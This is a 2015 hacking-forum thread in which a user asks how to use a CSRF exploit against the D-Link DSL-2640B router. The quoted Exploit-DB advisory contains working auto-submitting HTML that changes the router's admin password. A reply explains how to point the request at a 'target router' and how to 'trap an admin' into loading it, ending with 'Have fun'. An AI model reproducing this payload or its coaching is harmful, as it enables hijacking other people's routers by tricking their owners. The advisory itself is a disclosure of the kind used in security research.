Pages: [1]

Author Topic: D-Link DSL CSRF Exploit . How to Use/Test ??  (Read 1326 times)

0 Members and 1 Guest are viewing this topic.

Offline FurqanHanif

  • /dev/null
  • *
  • Posts: 18
  • Cookies: -6
    • View Profile
D-Link DSL CSRF Exploit . How to Use/Test ??
« on: May 02, 2015, 11:20:53 pm »
Someone Tell me How i Use this Exploit To test my Router . Their is Only Just HTML code is Given , someone explain this too me how i use this code exactly to change the password... ???

Quote
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date          : 19-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Vendor site   : http://www.d-link.com
# Version       : DSL-2640B
# Tested on     : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
 
1)Introduction
2)Vulnerability Description
3)Exploit
 
+---------------------------------------------------------------------------------------------------------------------------------+
 
 
1)Introduction
 
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
 
 
2)Vulnerability Description
 
The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router
parameters and -among other things- to change default administrator("admin") password.
 
3)Exploit
 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
 


https://www.exploit-db.com/exploits/18499/

Report to moderator   Logged

Offline n01xxv

  • Serf
  • *
  • Posts: 21
  • Cookies: 1
    • View Profile
Re: D-Link DSL CSRF Exploit . How to Use/Test ??
« Reply #1 on: May 03, 2015, 12:51:52 am »
Maybe the place of this topic is in the newbie section because it seems that you don't know what is a CSRF vuln.
Read this : https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

The important part of the exploit is that :
http://192.168.1.1/redpass.cgi?sysPassword=new_password&change=1
Replace 192.168.1.1 by the ip address of the target router. After you have "just to" trap an admin, if he go on this URL this will change his password to the wanted one (in this case : new_password and if he is logged as router admin).
The html code that you paste just redirect to this link (with the onload in the body section).

Have fun !
« Last Edit: May 03, 2015, 12:53:18 am by n01xxv »
Report to moderator   Logged
"Which came first, the bug or the exploit ?"
-- blackngel - Phrack 67 - 0x08
Pages: [1]